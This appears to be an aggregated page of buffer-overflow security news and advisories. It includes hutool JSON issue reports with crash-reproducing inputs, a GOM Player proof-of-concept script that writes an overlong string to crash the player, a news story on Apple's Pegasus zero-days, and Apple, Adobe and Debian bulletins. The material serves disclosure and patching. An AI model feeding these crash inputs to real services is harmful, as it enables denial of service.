hutool v5.8.21 was discovered to contain a buffer overflow via the component `jsonObject.putByPath`.

**hutool Buffer Overflow vulnerability**

Moderate severity GitHub Reviewed Published Sep 9, 2023 to the GitHub Advisory Database • Updated Sep 11, 2023

GHSA-7p8c-crfr-q93p: hutool Buffer Overflow vulnerability

hutool v5.8.21 was discovered to contain a buffer overflow via the component `jsonArray`.

GHSA-rxgf-r843-g53h: hutool Buffer Overflow vulnerability

hutool v5.8.21 was discovered to contain a buffer overflow via the component JSONUtil.parse().

**版本情况**

JDK版本： 1.8.0\_362  
hutool版本： 5.8.21

**问题描述（包括截图）**

1.  复现代码

import cn.hutool.json.JSONUtil;

public class JSONOUtilTest {

    public static void main(String\[\] args) {
       String s = "{\\"G\\":00,\[,,\[0E5,6E9,6E5,6E9,6E5,6E9,6E5,6E9,6E9,6E5,true,6E5,6E9,6E5,6E9,6956,EE,5E9,6E5,RE,6E9,6E9,6E5,6E9,6E5,6E9,6E5,6E9,6E5,6E962756779,4141697\],\]}";
        new JSONOUtilTest().testHutoolJSON(s);
        new JSONOUtilTest().testGson(s);
    }

       // hutool-json测试
        public void testHutoolJSON (String str) {
            JSON json = JSONUtil.parse(str);
        }

        // gson测试
        public void testGson (String str) {
            Gson gson = new GsonBuilder().setPrettyPrinting().create();
            JSONObject entries = gson.fromJson(str, JSONObject.class);
            System.out.println(entries.toStringPretty());
        }
}

2.  堆栈信息

我们的服务使用了hutool-json来将字符串解析为json，当我们接收到的字符串为"{\"G\":00,[,,[0E5,6E9,6E5,6E9,6E5,6E9,6E5,6E9,6E9,6E5,true,6E5,6E9,6E5,6E9,6956,EE,5E9,6E5,RE,6E9,6E9,6E5,6E9,6E5,6E9,6E5,6E9,6E5,6E962756779,4141697],]}"时，JSONUtil.parse()挂起一段时间，然后服务崩溃，报错：

    Exception in thread "main" java.lang.OutOfMemoryError: Java heap space
    	at java.util.Arrays.copyOf(Arrays.java:3332)
    	at java.lang.AbstractStringBuilder.ensureCapacityInternal(AbstractStringBuilder.java:124)
    	at java.lang.AbstractStringBuilder.append(AbstractStringBuilder.java:649)
    	at java.lang.StringBuffer.append(StringBuffer.java:387)
    	at java.io.StringWriter.write(StringWriter.java:77)
    	at cn.hutool.json.serialize.JSONWriter.writeRaw(JSONWriter.java:392)
    	at cn.hutool.json.serialize.JSONWriter.writeValueDirect(JSONWriter.java:231)
    	at cn.hutool.json.serialize.JSONWriter.writeField(JSONWriter.java:196)
    	at cn.hutool.json.JSONArray.lambda$write$2cc9e97d$1(JSONArray.java:561)
    	at cn.hutool.json.JSONArray$$Lambda$6/379110473.accept(Unknown Source)
    	at cn.hutool.core.collection.CollUtil.forEach(CollUtil.java:2690)
    	at cn.hutool.core.collection.CollUtil.forEach(CollUtil.java:2674)
    	at cn.hutool.json.JSONArray.write(JSONArray.java:561)
    	at cn.hutool.json.serialize.JSONWriter.writeObjValue(JSONWriter.java:257)
    	at cn.hutool.json.serialize.JSONWriter.writeValueDirect(JSONWriter.java:239)
    	at cn.hutool.json.serialize.JSONWriter.writeField(JSONWriter.java:196)
    	at cn.hutool.json.JSONArray.lambda$write$2cc9e97d$1(JSONArray.java:561)
    	at cn.hutool.json.JSONArray$$Lambda$6/379110473.accept(Unknown Source)
    	at cn.hutool.core.collection.CollUtil.forEach(CollUtil.java:2690)
    	at cn.hutool.core.collection.CollUtil.forEach(CollUtil.java:2674)
    	at cn.hutool.json.JSONArray.write(JSONArray.java:561)
    	at cn.hutool.json.JSONArray.write(JSONArray.java:543)
    	at cn.hutool.json.JSON.toJSONString(JSON.java:120)
    	at cn.hutool.json.JSONArray.toString(JSONArray.java:522)
    	at cn.hutool.json.JSONParser.parseTo(JSONParser.java:69)
    	at cn.hutool.json.ObjectMapper.mapFromTokener(ObjectMapper.java:243)
    	at cn.hutool.json.ObjectMapper.mapFromStr(ObjectMapper.java:219)
    	at cn.hutool.json.ObjectMapper.map(ObjectMapper.java:98)
    	at cn.hutool.json.JSONObject.<init>(JSONObject.java:210)
    	at cn.hutool.json.JSONObject.<init>(JSONObject.java:187)
    	at cn.hutool.json.JSONUtil.parseObj(JSONUtil.java:112)
    	at cn.hutool.json.JSONUtil.parse(JSONUtil.java:227)
    

经测试，我们发现，如果使用gson解析上述字符串，gson能够捕获异常：

    Exception in thread "main" com.google.gson.JsonSyntaxException: duplicate key: G
    	at com.google.gson.internal.bind.MapTypeAdapterFactory$Adapter.read(MapTypeAdapterFactory.java:190)
    	at com.google.gson.internal.bind.MapTypeAdapterFactory$Adapter.read(MapTypeAdapterFactory.java:145)
    	at com.google.gson.Gson.fromJson(Gson.java:932)
    	at com.google.gson.Gson.fromJson(Gson.java:897)
    	at com.google.gson.Gson.fromJson(Gson.java:846)
    	at com.google.gson.Gson.fromJson(Gson.java:817)
    	at JSONOUtilTest.testGson(JSONOUtilTest.java:43)
    	at JSONOUtilTest.main(JSONOUtilTest.java:54)
    

3.  测试涉及到的文件（注意脱密）  
    见复现代码。
    
4.  分析
    

通过与gson运行结果的对比，JSONUtil.parse()方法解析特定输入时，会导致服务挂起和崩溃，存在安全隐患。

CVE-2023-42278: `JSONUtil.parse()`方法解析特定输入时，会导致服务挂起和崩溃，存在安全隐患 · Issue #3289 · dromara/hutool

hutool v5.8.21 was discovered to contain a buffer overflow via the component jsonObject.putByPath.

New issue

**Have a question about this project?** Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

**Comments**

**版本情况**

JDK版本： 1.8.0\_362  
hutool版本： 5.8.21

**问题描述（包括截图）**

1.  复现代码

import cn.hutool.json.JSONObject;

public class JSONObjectTest {

    public static void main(String\[\] args) {
        JSONObject jSONObject = new JSONObject();
        Object value = new Object();
        jSONObject.putByPath("...z.888888888", value);
    }
}

2.  堆栈信息

    Exception in thread "main" java.lang.OutOfMemoryError: Java heap space
    	at java.util.Arrays.copyOf(Arrays.java:3210)
    	at java.util.Arrays.copyOf(Arrays.java:3181)
    	at java.util.ArrayList.grow(ArrayList.java:267)
    	at java.util.ArrayList.ensureExplicitCapacity(ArrayList.java:241)
    	at java.util.ArrayList.ensureCapacityInternal(ArrayList.java:233)
    	at java.util.ArrayList.add(ArrayList.java:464)
    	at cn.hutool.json.JSONArray.addRaw(JSONArray.java:594)
    	at cn.hutool.json.JSONArray.add(JSONArray.java:352)
    	at cn.hutool.core.collection.ListUtil.setOrPadding(ListUtil.java:435)
    	at cn.hutool.core.collection.ListUtil.setOrPadding(ListUtil.java:414)
    	at cn.hutool.core.bean.BeanUtil.setFieldValue(BeanUtil.java:312)
    	at cn.hutool.core.bean.BeanPath.set(BeanPath.java:150)
    	at cn.hutool.core.bean.BeanPath.set(BeanPath.java:115)
    	at cn.hutool.json.JSONObject.putByPath(JSONObject.java:325)
    	at JSONObjectTest.main(JSONObjectTest.java:39)
    

3.  测试涉及到的文件（注意脱密）  
    见复现代码。

2 participants

CVE-2023-42277: `putByPath()`方法抛出OutOfMemory异常 · Issue #3285 · dromara/hutool

hutool v5.8.21 was discovered to contain a buffer overflow via the component jsonArray.

**版本情况**

JDK版本： 1.8.0\_362  
hutool版本： 5.8.21

**问题描述（包括截图）**

1.  复现代码

import cn.hutool.json.JSONObject;

public class JSONObjectTest {

    public static void main(String\[\] args) {
        JSONArray jSONArray = new JSONArray();
        Object element = new Object();
        jSONArray.add(1247626122, element);
    }
}

2.  堆栈信息

    Exception in thread "main" java.lang.OutOfMemoryError: Java heap space
    	at java.util.Arrays.copyOf(Arrays.java:3210)
    	at java.util.Arrays.copyOf(Arrays.java:3181)
    	at java.util.ArrayList.grow(ArrayList.java:267)
    	at java.util.ArrayList.ensureExplicitCapacity(ArrayList.java:241)
    	at java.util.ArrayList.ensureCapacityInternal(ArrayList.java:233)
    	at java.util.ArrayList.add(ArrayList.java:464)
    	at cn.hutool.json.JSONArray.addRaw(JSONArray.java:594)
    	at cn.hutool.json.JSONArray.add(JSONArray.java:352)
    	at cn.hutool.json.JSONArray.add(JSONArray.java:461)
    	at JSONArrayFuzzerTest19.main(JSONArrayFuzzerTest19.java:37)
    

3.  测试涉及到的文件（注意脱密）  
    见复现代码。
    
4.  分析
    

jsonArray.add(idx, [element)会在指定索引idx添加一个元素element。如果jsonArray长度小于指定索引，jsonArray.add()就会通过循环不断添加null，直到jsonArray的长度等于指定索引值。如果这个索引特别大，比如1247626122，就会报告一个OOM异常。

CVE-2023-42276: `JSONArray`的`add()`方法抛出OutOfMemory异常 · Issue #3286 · dromara/hutool

GOM Player version 2.3.90.5360 suffers from a buffer overflow vulnerability.

    # Exploit Title: GOM Player 2.3.90.5360 - Buffer Overflow (PoC)# Discovered by: Ahmet Ümit BAYRAM# Discovered Date: 30.08.2023# Vendor Homepage: https://www.gomlab.com# Software Link: https://cdn.gomlab.com/gretech/player/GOMPLAYERGLOBALSETUP_NEW.EXE# Tested Version: 2.3.90.5360 (latest)# Tested on: Windows 11 64bit# Thanks to: M. Akil GÜNDOĞAN#  - Open GOM Player#  - Click on the gear icon above to open settings#  - From the menu that appears, select Audio#  - Click on Equalizer#  - Click on the plus sign to go to the "Add EQ preset" screen#  - Copy the contents of exploit.txt and paste it into the preset name box, then click OK#  - Crashed!#!/usr/bin/pythonexploit = 'A' * 260try:    file = open("exploit.txt","w")    file.write(exploit)    file.close()    print("POC is created")except:    print("POC is not created")

GOM Player 2.3.90.5360 Buffer Overflow

Apple on Thursday released emergency security updates for iOS, iPadOS, macOS, and watchOS to address two zero-day flaws that have been exploited in the wild to deliver NSO Group's Pegasus mercenary spyware.
The issues are described as below -

CVE-2023-41061 - A validation issue in Wallet that could result in arbitrary code execution when handling a maliciously crafted attachment.
CVE-2023-41064

Apple on Thursday released emergency security updates for iOS, iPadOS, macOS, and watchOS to address two zero-day flaws that have been exploited in the wild to deliver NSO Group's Pegasus mercenary spyware.

The issues are described as below -

*   **CVE-2023-41061** - A validation issue in Wallet that could result in arbitrary code execution when handling a maliciously crafted attachment.
*   **CVE-2023-41064** - A buffer overflow issue in the Image I/O component that could result in arbitrary code execution when processing a maliciously crafted image.

While CVE-2023-41064 was found by the Citizen Lab at the University of Torontoʼs Munk School, CVE-2023-41061 was discovered internally by Apple, with "assistance" from the Citizen Lab.

The updates are available for the following devices and operating systems -

*   **iOS 16.6.1 and iPadOS 16.6.1** - iPhone 8 and later, iPad Pro (all models), iPad Air 3rd generation and later, iPad 5th generation and later, and iPad mini 5th generation and later
*   **macOS Ventura 13.5.2** - macOS devices running macOS Ventura
*   **watchOS 9.6.2** - Apple Watch Series 4 and later

In a separate alert, Citizen Lab revealed that the twin flaws have been weaponized as part of a zero-click iMessage exploit chain named BLASTPASS to deploy Pegasus on fully-patched iPhones running iOS 16.6.

"The exploit chain was capable of compromising iPhones running the latest version of iOS (16.6) without any interaction from the victim," the interdisciplinary laboratory said. "The exploit involved PassKit attachments containing malicious images sent from an attacker iMessage account to the victim."

Additional technical specifics about the shortcomings have been withheld in light of active exploitation. That said, the exploit is said to bypass the BlastDoor sandbox framework set up by Apple to mitigate zero-click attacks.

"This latest find shows once again that civil society is targeted by highly sophisticated exploits and mercenary spyware," Citizen Lab said, adding the issues were found last week when examining the device of an unidentified individual employed by a Washington D.C.-based civil society organization with international offices.

UPCOMING WEBINAR

Way Too Vulnerable: Uncovering the State of the Identity Attack Surface

Achieved MFA? PAM? Service account protection? Find out how well-equipped your organization truly is against identity threats

Supercharge Your Skills

Cupertino has so far fixed a total of 13 zero-day bugs in its software since the start of the year. The latest updates also arrive more than a month after the company shipped fixes for an actively exploited kernel flaw (CVE-2023-38606).

News of the zero-days comes as the Chinese government is believed to have ordered a ban prohibiting central and state government officials from using iPhones and other foreign-branded devices for work in an attempt to reduce reliance on overseas technology and amid an escalating Sino-U.S. trade war.

"The real reason \[for the ban\] is: cybersecurity (surprise surprise)," Zuk Avraham, security researcher and founder of Zimperium, said in a post on X. "iPhones have an image of being the most secure phone... but in reality, iPhones are not safe at all against simple espionage."

"Don't believe me? Just look at the number of 0-clicks commercial companies like NSO had over the years to understand that there is almost nothing an individual, an organization, or a government can do to protect itself against cyber espionage via iPhones."

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Apple Rushes to Patch Zero-Day Flaws Exploited for Pegasus Spyware on iPhones

A buffer overflow issue was addressed with improved memory handling. This issue is fixed in macOS Ventura 13.5.2, iOS 16.6.1 and iPadOS 16.6.1. Processing a maliciously crafted image may lead to arbitrary code execution. Apple is aware of a report that this issue may have been actively exploited.

This document describes the security content of macOS Ventura 13.5.2.

**About Apple security updates**

For our customers' protection, Apple doesn't disclose, discuss, or confirm security issues until an investigation has occurred and patches or releases are available. Recent releases are listed on the Apple security releases page.

Apple security documents reference vulnerabilities by CVE-ID when possible.

For more information about security, see the Apple Product Security page.

**macOS Ventura 13.5.2**

Released September 7, 2023

**ImageIO**

Available for: macOS Ventura

Impact: Processing a maliciously crafted image may lead to arbitrary code execution. Apple is aware of a report that this issue may have been actively exploited.

Description: A buffer overflow issue was addressed with improved memory handling.

CVE-2023-41064: The Citizen Lab at The University of Torontoʼs Munk School

Information about products not manufactured by Apple, or independent websites not controlled or tested by Apple, is provided without recommendation or endorsement. Apple assumes no responsibility with regard to the selection, performance, or use of third-party websites or products. Apple makes no representations regarding third-party website accuracy or reliability. Contact the vendor for additional information.

Published Date: September 07, 2023

CVE-2023-41064: About the security content of macOS Ventura 13.5.2

Adobe Photoshop versions 23.0.2 and 22.5.4 (and earlier) are affected by an out-of-bounds write vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious JPG file.

Security update available for Adobe Photoshop | APSB21-113

**Bulletin ID**

**Date Published**

**Priority**

APSB21-113

December 14,  2021        

3

**Summary**

Adobe has released an update for Photoshop for Windows and macOS. This update resolves a critical  and important vulnerability.  Successful exploitation could lead to arbitrary code execution and memory leak in the context of the current user.     
                   

**Affected Versions**

22.5.3 and earlier versions       

23.0.2 and earlier versions

**Solution**

Adobe categorizes these updates with the following priority ratings and recommends users update their installation to the newest version via the Creative Cloud desktop app’s update mechanism.  For more information, please reference this help page.    

**Product**

**Updated versions**

**Platform**

**Priority**

Photoshop 2021  

22.5.4  

Windows and macOS  

3  

Photoshop 2022

23.1  

Windows and macOS

3

For managed environments, IT administrators can use the Admin Console to deploy Creative Cloud applications to end users. Refer to this help page for more information.

**Vulnerability details**

**Vulnerability Category**

**Vulnerability Impact**

**Severity**

**CVSS base score**   

**CVSS vector**  

**CVE Number**

Out-of-bounds Write (CWE-787)  

Arbitrary code execution  

Critical

7.8

  CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

CVE-2021-43018  

Access of Memory Location After End of Buffer (CWE-788)  

Memory Leak

Important

5.5

CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N  

CVE-2021-43020  

Buffer Overflow (CWE-120)  

Arbitrary code execution  

Critical

7.8

CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H  

CVE-2021-44184  

**Acknowledgments**

Adobe would like to thank the following researcher for reporting this issue and for working with Adobe to help protect our customers:    

*   Mat Powell working with Trend Micro Zero Day Initiative (CVE-2021-43018)
    
*   Kushal Arvind Shah of Fortinet's FortiGuard Labs (CVE-2021-43020 and CVE-2021-44184)

For more information, visit https://helpx.adobe.com/security.html, or email PSIRT@adobe.com.

CVE-2021-43018: Adobe Security Bulletin

Debian Linux Security Advisory 5490-1 - Multiple security vulnerabilities have been discovered in aom, the AV1 Video Codec Library. Buffer overflows, use-after-free and NULL pointer dereferences may cause a denial of service or other unspecified impact if a malformed multimedia file is processed.

    -----BEGIN PGP SIGNED MESSAGE-----Hash: SHA512- -------------------------------------------------------------------------Debian Security Advisory DSA-5490-1                   security@debian.orghttps://www.debian.org/security/                          Markus KoschanySeptember 06, 2023                    https://www.debian.org/security/faq- -------------------------------------------------------------------------Package        : aomCVE ID         : CVE-2020-36130 CVE-2020-36131 CVE-2020-36133 CVE-2020-36135                 CVE-2021-30473 CVE-2021-30474 CVE-2021-30475Multiple security vulnerabilities have been discovered in aom, the AV1 VideoCodec Library. Buffer overflows, use-after-free and NULL pointer dereferencesmay cause a denial of service or other unspecified impact if a malformedmultimedia file is processed.For the oldstable distribution (bullseye), these problems have been fixedin version 1.0.0.errata1-3+deb11u1.We recommend that you upgrade your aom packages.For the detailed security status of aom please refer toits security tracker page at:https://security-tracker.debian.org/tracker/aomFurther information about Debian Security Advisories, how to applythese updates to your system and frequently asked questions can befound at: https://www.debian.org/security/Mailing list: debian-security-announce@lists.debian.org-----BEGIN PGP SIGNATURE-----iQKTBAEBCgB9FiEErPPQiO8y7e9qGoNf2a0UuVE7UeQFAmT3rHBfFIAAAAAALgAoaXNzdWVyLWZwckBub3RhdGlvbnMub3BlbnBncC5maWZ0aGhvcnNlbWFuLm5ldEFDRjNEMDg4RUYzMkVERUY2QTFBODM1RkQ5QUQxNEI5NTEzQjUxRTQACgkQ2a0UuVE7UeSTUw//f5aA9QXBT7ro8HZITTZFs0LH6PAc12iyc3ajZDldlKnapdt3d/QmtNyPw/Xv+rG1gY/1/VJg0Id6mEXqpMuuDHQvv3db7QeAn2P/JWK+qnS7o/rxJdtqbtgkuiDQ79AbmCNG6Km7J5pZuvzW7zY5QKcLEwpG0Xzjn+Uf0prtw1nLQU8sVs/MWLFzWxIym8+QT+xwrjj5j5wfXzhmMQJxKLVhn12zV0ZHYJ6RR3eKDKCJNpTkYia+OdQF573X50sStBUrs8DBguRemWfkOdaBnqcDscFX0ody+UWwQ4a7b2PlN8U4cyhEQ92BgEL57afIo9nrIYT4hHKjEWzYKN/O/NGm3bDol2xFlJkiXQvpildPMPNVChpnqudPVz9A78qJDtyJ6P0/VTeLjhB8uJcSMZUoLNXzH4XwObd1uAHow8/tHl32WK+1CdVie1qfCpKscDEL7O+Mn315K3xu6WfQ+volXlsPn+NbDtRsNvnSvbTbEvhBWByr8VpCOG+oMdoHvzqL+4aIA1lL7aioLCBNYH2F4ZQX7DabnLfcpbWWHXqswNAlv5UL+McmDA84RJgGycQS77gbvTsPvYYw+iuGNDVHiI+jtIsAROqwmmwtOXNb61GZLe8JpokAkZClfhja3DOxZE+LaPWPFECxmHlIQRf1Q81h5whD97WNDSgYz8E==vlUG-----END PGP SIGNATURE-----

Tag

#buffer_overflow